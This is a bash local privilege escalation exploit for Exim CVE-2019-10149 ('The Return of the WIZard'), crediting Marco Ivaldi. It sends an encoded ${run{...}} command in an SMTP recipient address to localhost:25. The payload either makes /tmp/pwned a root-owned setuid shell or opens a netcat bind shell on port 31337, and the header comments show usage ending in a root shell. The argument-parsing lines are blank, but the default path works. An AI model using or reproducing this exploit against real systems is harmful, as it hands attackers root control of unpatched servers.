#!/bin/bash## raptor_exim_wiz - "The Return of the WIZard" LPE exploit#

1. #!/bin/bash
2.  
3. #
4. # raptor_exim_wiz - "The Return of the WIZard" LPE exploit
5. # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
6. #
7. # A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
8. # Improper validation of recipient address in deliver_message()
9. # function in /src/deliver.c may lead to remote command execution.
10. # (CVE-2019-10149)
11. #
12. # This is a local privilege escalation exploit for "The Return
13. # of the WIZard" vulnerability reported by the Qualys Security
14. # Advisory team.
15. #
16. # Credits:
17. # Qualys Security Advisory team (kudos for your amazing research!)
18. # Dennis 'dhn' Herrmann (/dev/tcp technique)
19. #
20. # Usage (setuid method):
21. # $ id
22. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
23. # $ ./raptor_exim_wiz -m setuid
24. # Preparing setuid shell helper...
25. # Delivering setuid payload...
26. # [...]
27. # Waiting 5 seconds...
28. # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
29. # # id
30. # uid=0(root) gid=0(root) groups=0(root)
31. #
32. # Usage (netcat method):
33. # $ id
34. # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
35. # $ ./raptor_exim_wiz -m netcat
36. # Delivering netcat payload...
37. # Waiting 5 seconds...
38. # localhost [127.0.0.1] 31337 (?) open
39. # id
40. # uid=0(root) gid=0(root) groups=0(root)
41. #
42. # Vulnerable platforms:
43. # Exim 4.87 - 4.91
44. #
45. # Tested against:
46. # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
47. #
48.  
49. METHOD="setuid" # default method
50. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
51. PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
52.  
53. # usage instructions
54. function usage()
55. {
56. echo "$0 [-m METHOD]"
57. echo
58. echo "-m setuid : use the setuid payload (default)"
59. echo "-m netcat : use the netcat payload"
60. echo
61. exit 1
62. }
63.  
64. # payload delivery
65. function exploit()
66. {
67. # connect to localhost:25
68. exec 3<>/dev/tcp/localhost/25
69.  
70. # deliver the payload
71. read -u 3 && echo $REPLY
72. echo "helo localhost" >&3
73. read -u 3 && echo $REPLY
74. echo "mail from:<>" >&3
75. read -u 3 && echo $REPLY
76. echo "rcpt to:<$PAYLOAD>" >&3
77. read -u 3 && echo $REPLY
78. echo "data" >&3
79. read -u 3 && echo $REPLY
80. for i in {1..31}
81. do
82. echo "Received: $i" >&3
83. done
84. echo "." >&3
85. read -u 3 && echo $REPLY
86. echo "quit" >&3
87. read -u 3 && echo $REPLY
88. }
89.  
90. # print banner
91. echo
92. echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
93. echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
94. echo
95.  
96. # parse command line
97.  
98.  
99.  
100.  
101. # prepare a setuid shell helper to circumvent bash checks
102. echo "Preparing setuid shell helper..."
103. echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
104. gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
105. if [ $? -ne 0 ]; then
106. echo "Problems compiling setuid shell helper, check your gcc."
107. echo "Falling back to the /bin/sh method."
108. cp /bin/sh /tmp/pwned
109. fi
110. echo
111.  
112. # select and deliver the payload
113. echo "Delivering $METHOD payload..."
114. PAYLOAD=$PAYLOAD_SETUID
115. exploit
116. echo
117.  
118. # wait for the magic to happen and spawn our shell
119. echo "Waiting 5 seconds..."
120. sleep 5
121. ls -l /tmp/pwned
122. /tmp/pwned